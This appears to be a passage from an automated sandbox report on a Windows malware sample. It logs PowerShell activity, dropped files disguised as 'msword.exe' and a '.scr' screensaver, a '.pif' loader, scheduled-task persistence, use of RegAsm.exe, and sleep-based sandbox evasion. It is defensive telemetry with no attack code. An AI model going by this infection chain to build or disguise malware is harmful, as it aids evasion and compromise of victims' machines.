              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeMemory allocated: C40000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeMemory allocated: 2870000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeMemory allocated: 27B0000 memory reserve | memory write watch
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3545Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4825Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5348Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 586Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6164
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3405
              Source: C:\Windows\SysWOW64\timeout.exeWindow / User API: threadDelayed 743
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifWindow / User API: threadDelayed 5043
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeWindow / User API: threadDelayed 884
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeWindow / User API: threadDelayed 8918
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifAPI coverage: 6.3 %
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrAPI coverage: 4.5 %
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep count: 3545 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7172Thread sleep count: 4825 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7208Thread sleep time: -13835058055282155s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7232Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7040Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7240Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7476Thread sleep count: 5348 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7488Thread sleep count: 586 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep time: -8301034833169293s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7460Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8020Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4456Thread sleep count: 6164 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4080Thread sleep count: 3405 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7360Thread sleep time: -11068046444225724s >= -30000s
              Source: C:\Windows\SysWOW64\timeout.exe TID: 4088Thread sleep count: 743 > 30
              Source: C:\Windows\SysWOW64\timeout.exe TID: 4088Thread sleep time: -74300s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif TID: 7236Thread sleep time: -50430s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 5700Thread sleep time: -60000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 6228Thread sleep count: 37 > 30
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 6228Thread sleep time: -34126476536362649s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 6304Thread sleep count: 884 > 30
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 6304Thread sleep count: 8918 > 30
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifThread sleep count: Count: 5043 delay: -10
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_004062D5 FindFirstFileW,FindClose,15_2_004062D5
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_00402E18 FindFirstFileW,15_2_00402E18
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,15_2_00406C9B
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01044005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,28_2_01044005
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0104494A GetFileAttributesW,FindFirstFileW,FindClose,28_2_0104494A
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01043CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,28_2_01043CE2
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0104C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,28_2_0104C2FF
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0104CD14 FindFirstFileW,FindClose,28_2_0104CD14
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0104CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,28_2_0104CD9F
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0104F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,28_2_0104F5D8
